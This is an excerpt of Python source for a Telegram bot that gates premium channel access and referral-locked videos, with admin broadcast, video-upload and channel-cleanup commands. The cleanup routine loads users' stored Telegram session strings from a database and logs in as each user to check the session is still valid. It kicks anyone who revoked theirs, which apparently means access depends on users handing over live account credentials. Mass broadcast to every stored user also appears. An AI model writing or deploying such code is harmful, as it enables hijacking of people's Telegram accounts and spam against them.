message.reply("📢 Send the message you want to broadcast. (Send /cancel to abort)") async def process_broadcast(client, message): text = message.text or message.caption if text == '/cancel': admin_states.pop(message.chat.id, None) await message.reply("❌ Cancelled.") return await message.reply("⏳ Broadcast started...") admin_states.pop(message.chat.id, None) try: all_users, start, step = [], 0, 1000 while True: res = await db_query(lambda: supabase.table('referrals').select('user_id').range(start, start + step - 1).execute()) if not res.data: break all_users.extend(res.data) start += step success, failed = 0, 0 for u in all_users: try: await message.copy(chat_id=u['user_id']) success += 1 await asyncio.sleep(0.15) except FloodWait as e: await asyncio.sleep(e.value + 1) try: await message.copy(chat_id=u['user_id']) success += 1 except Exception: failed += 1 except Exception: failed += 1 await message.reply(f"✅ Broadcast Complete!\nSuccess: {success}\nFailed: {failed}") except Exception as e: print(e) @bot.on_message(filters.command(["png", "addvideo"]) & filters.private & filters.user(ADMIN_IDS)) async def add_png(client, message): try: parts = message.command needed_ref, duration = 3, "random" if len(parts) == 4 and parts[1].isdigit(): needed_ref, duration, thumbnail_url = int(parts[1]), parts[2], parts[3] elif len(parts) == 3 and parts[1].isdigit(): needed_ref, thumbnail_url = int(parts[1]), parts[2] elif len(parts) == 2: thumbnail_url = parts[1] else: return await message.reply("❌ Invalid format.") admin_states[message.chat.id] = {"step": 1, "thumbnail_url": f"{thumbnail_url}||{duration}", "needed_ref": needed_ref} await message.reply("✅ Now send the Video/Embed Link.") except Exception as e: print(e) @bot.on_message(filters.command("clean") & filters.private & filters.user(ADMIN_IDS)) async def manual_clean_channel(client, message): await message.reply("⏳ Starting channel cleanup...\nChecking database users to verify active sessions. This might take a while.") try: kicked, checked = 0, 0 res_users = await db_query(lambda: supabase.table('referrals').select('user_id').execute()) if not res_users.data: await message.reply("❌ No users found in database!") return user_ids = [u['user_id'] for u in res_users.data] for user_id in set(user_ids): try: chat_member = await bot.get_chat_member(PREMIUM_CHANNEL_ID, user_id) if chat_member.status in [enums.ChatMemberStatus.MEMBER, enums.ChatMemberStatus.RESTRICTED]: checked += 1 res_session = await db_query(lambda: supabase.table('user_sessions').select('session_string').eq('user_id', user_id).execute()) is_valid = False if res_session.data: session_string = res_session.data[0]['session_string'] temp_client = Client(f"bg_chk_{user_id}", session_string=session_string, api_id=API_ID, api_hash=API_HASH, in_memory=True) try: await temp_client.connect() await temp_client.get_me() await temp_client.disconnect() is_valid = True except (SessionRevoked, AuthKeyUnregistered, UserDeactivated): try: await temp_client.disconnect() except: pass await db_query(lambda: supabase.table('user_sessions').delete().eq('user_id', user_id).execute()) except Exception: try: await temp_client.disconnect() except: pass is_valid = True if not is_valid: try: await bot.ban_chat_member(PREMIUM_CHANNEL_ID, user_id) await bot.unban_chat_member(PREMIUM_CHANNEL_ID, user_id) except Exception: pass await asyncio.sleep(2) except FloodWait as e: await asyncio.sleep(e.value + 1) except Exception: pass except Exception as e: print(f"Auto clean error: {e}") await asyncio.sleep(4 * 3600) @bot.on_message(filters.private & filters.user(ADMIN_IDS) & ~filters.command(["start", "stats", "users", "broadcast", "png", "addvideo", "blur", "clean", "sendto", "clone", "upload"])) async def catch_admin_steps(client, message): state = admin_states.get(message.chat.id, {}) if state.get("step") == 1: if not message.text: return video_url = message.text.strip() if video_url == "/cancel": admin_states.pop(message.chat.id, None) return await message.reply("❌ Cancelled.") try: await db_query(lambda: supabase.table('videos').insert({"video_url": video_url, "thumbnail_url": state["thumbnail_url"], "needed_ref": state["needed_ref"]}).execute()) await message.reply("🎉 Video added successfully!") except Exception as e: print(e) finally: admin_states.pop(message.chat.id, None) elif state.get("step") == "broadcast": await process_broadcast(client, message) def run_flask(): app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 7860)), threaded=True) async def main(): await bot.start() print("🤖 Pyrogram Bot & Real Session API is running!") asyncio.create_task(auto_clean_channel_loop()) await idle() await bot.stop() if __name__ == "__main__": threading.Thread(target=run_flask, daemon=True).start() main_loop.run_until_complete(main())